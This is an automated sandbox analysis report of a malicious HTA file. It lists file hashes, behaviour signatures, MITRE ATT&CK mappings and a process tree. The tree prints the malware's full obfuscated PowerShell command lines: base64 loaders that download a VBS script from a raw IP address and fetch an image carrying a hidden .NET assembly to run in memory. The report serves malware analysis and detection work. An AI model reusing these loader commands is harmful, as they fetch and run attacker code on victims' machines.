5c9cb60a6bf32648964076e620fe9560ead5fb09ab9b8017667daa13b88ce5c6

Analysis

max time kernel
14s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
07-02-2025 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mydreamgirlsheismybestgirleveriseenwithherlovergood.hta
Size

15KB
MD5

fae5ca5adff365408b3e3054c123c681
SHA1

d6477f5d534c121bc0fff71f050e311526d9e5f3
SHA256

5c9cb60a6bf32648964076e620fe9560ead5fb09ab9b8017667daa13b88ce5c6
SHA512

6744d1ea402c690df3db54db55a007be8c50426ee23943ab6c518861e79838f1d1c829b2890fb4ebed8ed79bc49f4fc47647ce1d0192fb284a207471165f4d6e
SSDEEP

96:dunKunqqFzsff/FbcorJFmqei+UunzunJ6unx+:8ZqUs39bsi+TavA

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2872	powershell.exe
6	960	powershell.exe
8	960	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2872	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
960	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2872	powershell.exe
960	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 3028	1492	mshta.exe	29
PID 1492 wrote to memory of 3028	1492	mshta.exe	29
PID 1492 wrote to memory of 3028	1492	mshta.exe	29
PID 1492 wrote to memory of 3028	1492	mshta.exe	29
PID 3028 wrote to memory of 2872	3028	cmd.exe	31
PID 3028 wrote to memory of 2872	3028	cmd.exe	31
PID 3028 wrote to memory of 2872	3028	cmd.exe	31
PID 3028 wrote to memory of 2872	3028	cmd.exe	31
PID 2872 wrote to memory of 3016	2872	powershell.exe	32
PID 2872 wrote to memory of 3016	2872	powershell.exe	32
PID 2872 wrote to memory of 3016	2872	powershell.exe	32
PID 2872 wrote to memory of 3016	2872	powershell.exe	32
PID 3016 wrote to memory of 2960	3016	csc.exe	33
PID 3016 wrote to memory of 2960	3016	csc.exe	33
PID 3016 wrote to memory of 2960	3016	csc.exe	33
PID 3016 wrote to memory of 2960	3016	csc.exe	33
PID 2872 wrote to memory of 2704	2872	powershell.exe	35
PID 2872 wrote to memory of 2704	2872	powershell.exe	35
PID 2872 wrote to memory of 2704	2872	powershell.exe	35
PID 2872 wrote to memory of 2704	2872	powershell.exe	35
PID 2704 wrote to memory of 960	2704	WScript.exe	36
PID 2704 wrote to memory of 960	2704	WScript.exe	36
PID 2704 wrote to memory of 960	2704	WScript.exe	36
PID 2704 wrote to memory of 960	2704	WScript.exe	36

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mydreamgirlsheismybestgirleveriseenwithherlovergood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40wtol0i.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3016
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF845.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF834.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwByAGUAdgBvAGwAcgBlAGgAaAB0AGkAdwBuAGUAZQBzAGkAcgBlAHYAZQBsAHIAaQBnAHQAcwBlAGIAeQBtAHMAaQBlAGgAcwBsAHIAaQBnAG0AYQBlAHIAZAB5AG0ALwAzADMANAA1AC8AMgAxADIALgAzADAAMgAuADUAMwAyAC4ANQAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABnAG8AaAB1ADcAcwBsAHgALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMAOAA4ADQANQAwADAANAAvAGsAZAB4AHoAbQBlAHkAbAA0ADEAZgAxAHMAcwBtAHkAaAA0AGEAeAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\40wtol0i.dll

Filesize
3KB

MD5
48f235e90d5dc97a9edbf241f2f63744

SHA1
c681f922f43d6ebe7c0c040b483f1b7856937891

SHA256
0dd42fa7a2fc540d51f800ef74909968796e19a51045e766dc40dbbcc5234f30

SHA512
9de740fca82b359e662f95e2e68f510525ca7eb2cf3107c3e8ad3b78659e82faf919478f0054c549bc5dfa89aa68fdb88f681bfff89a0174cf22c6e0ba1cefeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\40wtol0i.pdb

Filesize
7KB

MD5
583612883c7cb47e40b10590a195f214

SHA1
c90ab034707442a9f47edb0b976035539cb4630f

SHA256
93e4223a7bb5e45664aa66f7f9be73d1881752b1b3314b2154c9adcffa38d019

SHA512
c7d5840c640b8319ce2d7fb3e18975f7b347cd2b886b81a32e8a357f8093c7f37e23b61195fcbf675dc8e9359b6989f0e50f2350fbc93ec8662e5412e7aac62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab13C1.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF845.tmp

Filesize
1KB

MD5
fbe7f34f15f3b53d020a099cc855a7e7

SHA1
f659053b35b06d9629ae19b6f7f7732834729bb9

SHA256
1f3743dca73da3cedae563fe6dbf842072a2de7d6e407fb35c0070d63c7c7512

SHA512
1f145622a2e792d5bfa3b159dd53941f4c88c653e3cfe53b8382ac41c9262ce81df07572a8205d61c4d9e21f0a7fe99f84b07a3e5eb794717c866ac6b824a1a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1460.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
578a50d00539b71b5ea844661e3ee287

SHA1
3c32177b1b2eaa3f989831538df4c4adbdcf8068

SHA256
3269e2b27ab53fabaccbe11d2b2af21c330bced5c9ad149f15994e702c8b0496

SHA512
426f4ec330c1ddb20ec76e6679fcf7b78b3dc9b06af8ab650e52bdc226745cc2e099e410c310257184beb891664a98aef201ecf29336d99647bddbd5a30be32b

Download Submit
C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs

Filesize
185KB

MD5
88381fe4eced12ab51b61b701655dfc4

SHA1
363e0d60930acafa210f5f9123f4a935fe8b32f2

SHA256
544f1930b15b1ad1efc93e230a48aa877044acdac4d42e15dd4f3b293eb4b1ae

SHA512
89389de03393aab55f6d016a99c94a8e005b9b3da233d7305f7df90432ec130ac70a0d5d3ac44adb620dad7dfb897511328c1fd747a83472284e94d992d773bb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\40wtol0i.0.cs

Filesize
481B

MD5
3d85a0a117fb394a23636614a6bed698

SHA1
d1bd8ef2834bc9eccee2985192067441a8988974

SHA256
bed32737b1920c7ab8195497a0b2db0763a67a9b23561c2e5b68fe3d295edaff

SHA512
59a405e2fa77fecc7163e02b11c64a8f08f744392d712c6a6e08194d6dee41d8af64fbef08dc6e3f18e43cb3636aff4d8c25596d3bfeefbe80df8fb726e3f0dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\40wtol0i.cmdline

Filesize
309B

MD5
23e0b487cc2c5c1d7ace742dd9ed7856

SHA1
288c9e874a493e4a42b5a6bdace864df6a49c549

SHA256
a60c666f7889c3a034170f034cea499df982ecc50d0477938c4e50edef1371a0

SHA512
a9430465d7a6d4f79b1bfd8b78073cf9fe1ca2def339cc33739950018e16529a44c0cbe4020453d0631108378f28a0757660f154bea7983364fed7006435bd8b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF834.tmp

Filesize
652B

MD5
24e8a28783aa0ab9580758f55b0ee31c

SHA1
a522288708cee61face4fb911f8fbf8e434cce3f

SHA256
89e6793716cceee4091bc7b7deb7f877f23c9394adec30e1644bdd38ce7659e8

SHA512
92a5ec8ce900cd50ebad7a97ae8ccfc669bcc20d33f655803719a238579329a2efcfbd93b20e25b5f0063341340cb3932bccfac8e1352346a2150d17e6251619

Download Submit